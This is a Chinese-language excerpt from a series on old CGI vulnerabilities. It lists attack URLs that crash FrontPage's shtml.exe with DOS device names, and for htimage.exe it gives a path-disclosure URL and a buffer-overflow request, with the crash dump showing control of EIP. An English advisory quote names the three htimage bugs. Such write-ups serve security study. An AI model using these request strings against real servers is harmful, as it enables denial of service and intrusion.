CGI漏洞

CGI漏洞(18) http://www.example.com/_vti_bin/shtml.exe/com1 ;
http://www.example.com/_vti_bin/shtml.exe/aux ;
http://www.example.com/_vti_bin/shtml.exe/pipe.htm ;
三十三.htimage.exe
htimage存在三个安全问题：
1、暴露web根目录本地磁盘路径，正如你在上面看到的，使用下面的方式可以成功看到对方的web目录
磁盘路径位置：
http://www.xxx.com/cgi-bin/htimage.exe/linux?0,0

CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with 
FrontPage. I found three bugs 
in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple 
buffer overflow 3) Allow 
us to Access files. 
2、缓冲溢出：
在 windows9x上，目标为Microsoft-PWS-95/2.0和 FrontPage-PWS32的服务器上测试通过。
http://www.xxx.com/cgi-bin/htimage.exe/<;...1个字符>?0,0. 
这时在被攻击目标的控制台上将发现如下错误：

HTIMAGE caused an invalid page fault in 
module at 0000:41414141. 
Registers: 
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246 
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4